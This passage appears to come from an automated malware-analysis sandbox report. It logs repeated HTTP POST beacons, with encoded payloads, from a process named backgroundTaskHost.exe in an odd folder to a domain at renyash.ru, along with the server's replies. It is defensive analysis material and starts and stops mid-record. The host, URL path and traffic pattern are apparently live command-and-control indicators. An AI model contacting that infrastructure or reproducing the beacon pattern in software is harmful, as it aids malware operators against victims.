                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LShWaaTOhTnmxPbBvO3uHhRRexp5xgGuEw170V8IssSjLNDnSxDljaJqhKrc0ppEtSKNLMyj1uxzDC0a514Q160qJeEXgZbw8eEnSt2d%2BovIcjlft3vmQLroROEexVrjW4GF56jA"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c37ee8578dc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3949&min_rtt=1861&rtt_var=4875&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=78612&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          2 | 192.168.2.4 | 49738 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:07:38.732323885 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:39.076467037 CET2520OUTData Raw: 51 5d 5e 54 55 5f 5a 5d 5c 5b 52 58 57 52 58 58 58 51 5a 5e 52 56 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^TU_Z]\[RXWRXXXQZ^RVQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B()7B#"'0+X)<]">5[&>R#="R+/ (64>>+!Y#!Y,
                                                                                          Jan 4, 2025 11:07:39.195727110 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:39.467880964 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4JwHXCZoTlPp%2BWm6asRXEe8NcjJycE9NAIJj2i1eYFgGNePdP%2FZari9XHmzYg6Azcy4DZ9mFFUyt7z7ujShF080Q704zAOU%2BPt%2FOuYN9eyVx%2F8Q8Hqo7RRkTxdRM9sqN5BEcZSv"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c3dad454378-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3364&min_rtt=1728&rtt_var=3921&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=98502&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          3 | 192.168.2.4 | 49739 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:07:39.795540094 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:40.154757977 CET2520OUTData Raw: 51 59 5e 50 55 53 5a 55 5c 5b 52 58 57 5c 58 5f 58 50 5a 5a 52 54 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^PUSZU\[RXW\X_XPZZRTQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E()'"+!13+(,-"-!\0;W X*W<;^(%'4>^=;!Y#!Y,>
                                                                                          Jan 4, 2025 11:07:40.254442930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:40.519656897 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPOk148uMmd0ununAlG%2Fjx%2BPEdnkUNx11zi6Liuyr3bvx4ZhdDaedTz8KvA1r7F6o5jeZ2jHtTrpVKhySlpHlaCyLK3PNjhehcpITMBXBmFap5mj03QRke980fPxrDzXdmjUUEsT"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c444aad18b8-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3479&min_rtt=1458&rtt_var=4589&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=82822&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          4 | 192.168.2.4 | 49742 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:07:41.029134989 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:41.373244047 CET2520OUTData Raw: 54 5f 5b 50 50 5b 5a 5c 5c 5b 52 58 57 52 58 5f 58 52 5a 58 52 54 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[PP[Z\\[RXWRX_XRZXRTQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.):74Q2#>Z9]"='-846Q?Z#]+$#"[=!Y#!Y,
                                                                                          Jan 4, 2025 11:07:41.476635933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:41.753307104 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORQj7LXnzTaoHTZZGrLNdGI4QrRKcU4tIOg%2FwfJ2Vgnhuk67dl%2FphA4JwXtMw%2F2H3ZWbAWSan6cHabVjOvEtq97iVjt5%2FVZXRZvOJ%2FR4dk2FCtMcxGQWwamiKermTGtBeabS5Yyl"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c4bff1b421b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3424&min_rtt=2123&rtt_var=3398&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=116492&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          5 | 192.168.2.4 | 49743 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:07:42.264420033 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:42.623254061 CET2520OUTData Raw: 54 5f 5b 52 55 58 5f 54 5c 5b 52 58 57 52 58 5c 58 57 5a 5d 52 5c 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[RUX_T\[RXWRX\XWZ]R\QW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>4 )&3()?&5>:3?P7>&R<,,(67-)+!Y#!Y,
                                                                                          Jan 4, 2025 11:07:42.718677044 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:42.933715105 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:42.979851007 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVbTncp873CGeYfdg4CGqcKbs%2B5yAiQICXo%2FbCeJ3FNYGaBGgthvJtT1X5DWhFDAkRdP9XqEy9hJZSHo3%2FHqh13xLInykaRugQSXDg%2BTaTDIGXxbyPM4kMt57y41wKa1vn3bYtRM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c53b8e2c339-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8040&min_rtt=1681&rtt_var=13349&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27779&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          6 | 192.168.2.4 | 49745 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:07:43.319298983 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          7           192.168.2.4  49746        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:43.521172047 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:43.873435020 CET1844OUTData Raw: 51 5a 5b 54 50 5b 5f 54 5c 5b 52 58 57 52 58 59 58 53 5a 52 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[TP[_T\[RXWRXYXSZRRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)*?C#(20#=,[!=6&>8#>!??5 4-)!Y#!Y,
                                                                                          Jan 4, 2025 11:07:43.984154940 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:45.280385017 CET  961  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ehHbaAOlBOZ8ROUlgkYUUhSX7ZDbPgXs%2FXXtsuflBLs%2B7S%2FSpRZIPV%2BKaY7bZAQ6cWIQFu9mww%2FK9AVLEnIq7%2FkmKfwoI%2Fo1k8jc8DMAu7K0DdstAwz1tj8DEZRIbW8Dwgj3YOP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c5b998343ac-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4431&min_rtt=1713&rtt_var=6080&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=62225&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 53 29 2d 20 55 36 06 24 12 29 07 3e 5a 25 20 05 06 3b 08 28 06 34 3c 30 03 38 32 0c 01 33 0d 28 58 2a 3c 24 54 37 1e 2f 1e 27 0a 2a 5d 06 12 3b 00 28 3c 31 00 26 38 2a 52 3e 0b 21 18 30 18 3e 5e 30 3d 0d 5a 28 02 32 07 25 3f 26 08 29 11 36 5a 3a 2a 2f 1e 38 05 30 1c 22 39 21 53 08 13 20 1e 26 0f 2b 10 2a 1e 22 01 31 0d 3e 04 30 39 34 0e 29 3b 34 50 25 3e 04 5d 2d 08 2b 11 3f 55 3b 00 39 3d 24 15 3e 3e 33 50 33 16 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$S)- U6$)>Z% ;(4<0823(X*<$T7/'*];(<1&8*R>!0>^0=Z(2%?&)6Z:*/80"9!S &+*"1>094);4P%>]-+?U;9=$>>3P3"\ #V=WL0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          8           192.168.2.4  49747        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:47.593194962 CET  293  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:47.951421976 CET2520OUTData Raw: 54 5c 5e 51 55 53 5f 53 5c 5b 52 58 57 5b 58 5c 58 55 5a 59 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^QUS_S\[RXW[X\XUZYRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*)/B421/])2#>9\$7>.+/3*%7\ %=!Y#!Y,"
                                                                                          Jan 4, 2025 11:07:48.040193081 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:48.314719915 CET  807  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:48 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPxyTa2Udl8TpPgfFE8sVzKXcM5IcW9k4tvMCIQzYEoKM9qBCzqQgU1z6gWx2cFuxXiX8se%2BIrIF1vFWL6X4tjLh4Z%2B%2Bw%2FdvCxJutJnS2drLP7mCEwCmmWoPsxKbrUIrWUD9alXX"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c74ffff4249-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2185&min_rtt=1714&rtt_var=1584&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=266326&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          9           192.168.2.4  49748        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:50.301980972 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:50.659266949 CET1844OUTData Raw: 51 5a 5e 55 50 5b 5a 5c 5c 5b 52 58 57 58 58 5d 58 55 5a 5f 52 55 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^UP[Z\\[RXWXX]XUZ_RUQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-(9 (2%07\))!!X0R >5??,*5 :^*+!Y#!Y,.
                                                                                          Jan 4, 2025 11:07:50.745023012 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:50.998327017 CET  954  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbVjdjEsCZHMsmoJxf7V%2B450kTntFimFdORrzhNBM05TRGCdUWO9TBZWAHtbUSnl6YAl%2BzlF1gFb9TJdH7qIj6UFxM50HLo6TsOFUYw%2BqFnwv1lWbSyHQGZvHtGnPStBUlk2uhar"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c85eca2c3f8-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2331&min_rtt=1496&rtt_var=2231&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=178505&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 54 2b 2e 3c 50 21 2f 20 5d 2b 3d 2e 58 26 0e 2b 03 3b 31 01 5f 23 05 33 11 2e 22 0f 1f 33 0d 28 14 3d 59 2c 55 21 33 27 55 24 20 2a 5d 06 12 38 5b 3f 3c 26 11 31 3b 04 53 28 22 00 45 30 18 0b 00 24 03 34 03 2b 3f 31 5f 31 2c 17 50 3e 3c 22 5b 2d 03 27 1b 2c 3f 3c 1d 35 03 21 53 08 13 20 54 32 0f 28 0d 3e 09 2a 02 26 1d 3a 02 27 2a 24 0e 3d 38 24 52 25 2d 36 5d 2d 57 38 01 2b 30 28 59 3a 58 24 5f 2b 00 02 0f 24 16 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$T+.<P!/ ]+=.X&+;1_#3."3(=Y,U!3'U$ *]8[?<&1;S("E0$4+?1_1,P><"[-',?<5!S T2(>*&:'*$=8$R%-6]-W8+0(Y:X$_+$"\ #V=WL0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          10          192.168.2.4  49751        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:54.611726046 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:54.969275951 CET2520OUTData Raw: 54 51 5b 53 55 52 5a 57 5c 5b 52 58 57 5c 58 59 58 55 5a 5b 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ[SURZW\[RXW\XYXUZ[R\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A=?7!%3')Z666&>W4-&Q?Z$?5+]#=">+!Y#!Y,>
                                                                                          Jan 4, 2025 11:07:55.066816092 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:55.235723019 CET  804  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWdJbCHzNWFBkhWnf5gSzdHRQcSKuFuIDJmEgWTqaMICoPhibXauPuJ7%2F0G93EeU8NP29pm%2BTlAWQpRWcc9jfz56MIDuhYaPxPALmvXVMGGnLEYcTx5%2FLN7lMkAswJjWaI1B24sy"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ca0e8850f51-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3652&min_rtt=1733&rtt_var=4489&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=85425&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          11          192.168.2.4  49752        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:07:55.402632952 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
